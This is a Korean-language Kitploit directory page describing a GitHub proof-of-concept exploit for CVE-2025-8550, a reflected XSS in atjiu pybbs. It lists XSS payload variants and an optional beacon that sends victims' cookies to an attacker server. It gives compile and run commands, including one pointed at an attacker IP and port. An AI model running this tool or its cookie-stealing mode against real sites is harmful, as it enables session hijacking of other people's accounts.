Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/bytereaper77/cve-2025-8550
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingArchived
GitHubbytereaper77/cve-2025-8550

CVE-2025-8550

# CVE-2025-8550 자동화 PoC 익스플로잇 atjiu pybbs의 반사형 XSS 취약점인 CVE-2025-8550에 대한 자동화된 개념 증명(PoC) 익스플로잇입니다. 20개 이상의 페이로드 변형, 쿠키 탈취, 멀티스레딩, 그리고 침투 테스트를 위한 사용자 지정 가능한 CLI를 제공합니다.

저장소 보기
31111개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-8550 – atjiu pybbs XSS 익스플로잇

설명

이 저장소는 atjiu pybbs (≤ v6.0.0)에서 발견된 반사형 교차 사이트 스크립팅(XSS) 취약점인 CVE-2025-8550에 대한 자동화된 개념 증명(PoC) 익스플로잇을 제공합니다. 이는 입력값 검증이 부족한 /admin/topic/list 엔드포인트의 username 매개변수를 대상으로 합니다.

기능

  • 20개 이상의 페이로드 변형: script, SVG, iframe, object, onerror 핸들러 등.

  • 자동 URL 인코딩: libcurl의 curl_easy_escape를 통해 안전한 인젝션을 보장합니다.

  • 쿠키 유출 (선택 사항): document.cookie를 공격자 제어 서버로 보내는 비콘 인젝션.

  • 멀티스레딩: pthreads를 사용하여 시도를 병렬화하고 테스트 속도를 높입니다.

  • 사용자 정의 가능한 CLI: argparse 기반으로 다음을 지정할 수 있습니다:

    • 대상 URL (-u / --url)
    • 인증된 요청을 위한 쿠키 파일 (-c / --cookies)
    • 쿠키 페이로드 활성화 (-k / --cokpay)
    • 공격자 서버 IP/포트 (-i / --ip, -p / --port)
    • 상세 로깅 (-v / --verbose)

빌드 및 사용법

root@kitploit:~
# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread 

# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]

#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
  • http://<TARGET>을 atjiu pybbs 인스턴스로 바꾸세요.
  • -k를 사용하여 쿠키 도용 비콘을 활성화하십시오 (-i 및 -p 필요).
  • 인증 쿠키가 필요하지 않으면 -c를 생략하십시오.

참고 자료 :

  • NVD 항목 : https://nvd.nist.gov/vuln/detail/CVE-2025-8550

라이선스 :

MIT License

도구 다운로드